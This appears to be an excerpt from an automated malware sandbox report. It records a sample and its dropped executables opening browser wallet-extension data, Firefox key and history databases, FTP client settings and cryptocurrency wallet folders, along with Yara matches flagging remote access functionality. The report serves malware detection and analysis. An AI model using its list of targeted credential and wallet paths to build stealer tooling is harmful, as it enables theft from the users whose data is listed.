Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Directory queried: number of queries: 1911
Source: Yara match File source: 00000019.00000003.3173096686.0000000001663000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2976096899.0000000001196000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2975895434.0000000001196000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2833491682.000000000133A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2998374022.0000000001195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2113351077.0000000006126000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2938184062.0000000001195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2959630451.0000000001195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3004771907.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2998226532.0000000001190000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 744, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c1b0009d40.exe PID: 7060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c1b0009d40.exe PID: 6308, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c1b0009d40.exe PID: 6552, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: Process Memory Space: 1dc3787ee3.exe PID: 3568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 744, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c1b0009d40.exe PID: 6308, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 10.2.7a5878ed96.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.7a5878ed96.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.num.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.0.num.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000002.3175826524.00000000011FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2870739086.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2913077883.000000000104E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.3018415386.0000000000191000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.3079747725.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3041700292.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3169928437.00000000005C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2911715801.00000000005C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3033467651.0000000000191000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3033601352.00000000001AE000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.3018510412.00000000001AE000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7a5878ed96.exe PID: 2220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 5704, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7a5878ed96.exe PID: 5144, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs